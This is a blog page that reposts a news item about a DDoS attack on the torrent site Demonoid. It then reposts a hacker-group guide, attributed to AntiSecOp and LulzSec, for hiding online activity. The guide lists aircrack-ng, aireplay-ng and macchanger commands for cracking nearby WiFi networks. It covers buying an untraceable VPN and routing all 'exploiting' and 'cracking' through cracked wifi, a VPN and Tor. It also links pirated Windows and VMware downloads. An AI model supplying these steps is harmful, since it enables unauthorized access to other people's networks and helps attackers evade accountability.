The Mis-Adventures in Technology of an Old Dog Learning New Tricks…

Posts tagged ‘demonoid’

Demonoid suffers DDoS attack

Demonoid hit by DDoS attack

My favorite website, Demonoid, had been under attack for the past few days.

(via ZDNet) Demonoid has been hit by a massive Distributed Denial of Service (DDoS) attack, bringing down the famous BitTorrent tracker to its knees. The torrent website has been inaccessible to its millions of users for more than a day and is expected to remain offline for quite some time.

As you can see in the screenshot above, Demonoid is currently serving up the following error message:

Server too busy

The action you requested could not be completed because the server is too busy.

Please try again in a few minutes

Do not click reload – Use the following links
Clicking reload will get you this page again

Click here to return to the homepage or Click here to go back

I said this attack was “massive” because it has resulted in a series of problems that may take a while to address. Over the years, Demonoid has been down many times, sometimes disappearing for months.

“It started as a DDoS but then it caused a series of problems,” Demonoid’s admin told TorrentFreak. “These problems need to be fixed before the site can go back up, and it’s a complicated fix this time. There might have been an attack from another angle, an exploit of sorts, but it’s hard to tell right now without a full check of everything. Our human resources became limited in the last few months. All tech issues are handled just by me now and there is no one else to take the job. I’ll fix the site as soon as possible, but it might be a while this time.”

It’s currently unclear whether or not the attack against Demonoid was anti-piracy related. Either way, Demonoid’s users have to find an alternative for their downloading needs while they wait for its return. (By Emil Protalinski )

See also:

Advertisements

Want to be a ghost on the internet?

This is an excellent tutorial for keeping your online anonymity, etc.  Thanks to LulzSec and AntiSecOp for the excellent information. This information is provide for educational purposes only. Utilize at your own risk! But most of all have fun! Enjoy!

Want to stay safe online?

By @AntiSecOp

Required files:VMWare Workstation:

http://www.demonoid.me/files/details/2787488/008172892720/

Windows 7 Ultimate: http://www.demonoid.me/files/details/2811393/003064834770/

BackTrack 5 R1 VMWare: http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-VM-32.7zpfsense: http://files.chi.pfsense.org/mirror/downloads/pfSense-2.0.1-RELEASE-amd64.iso.gz

Ubuntu Live CD: http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest

Required Hardware:

Virtualization supported CPU

4GB RAM

USB wifi adapter supporting packet injection:http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU/ref=sr_1_2?ie=UTF8&qid=1328768355&sr=8-2

VPN Account without paper trail

  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins

VPN ServicesoVPN.to

Step One

  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab

Step Two

  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type sudo “fdisk -l” to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above commandie “sudo wipe /dev/sda1”
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot

Step Three

  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder http://www.fileshredder.org
  • Run fileshredder using “Secure Erasing Algorithm with 7 passes”Reboot
  • Enable BitLocker drive encryption. Safe key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
  • Reboot

Step Four

Install VMWare

Step Five

  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

Easy Mode method:

  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers
  • Use aircrack-ng to crack surrounding AP’s
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger –mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) –bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK’s aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID

Step Six

  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (192.168.1.1/24)

Step Seven

Step Eight

  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from torproject.org
  • Use FireFox Portable bunlded with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM

Step Nine

Encrypt All VM’s

Open settings for Each VM in VMWare

Under Options > Enable Encryption

Set secure password

Torchat: OfflineE-mail: antisec@tormail.net

Twitter: https://twitter.com/AntiSecOp

Tag Cloud

%d bloggers like this: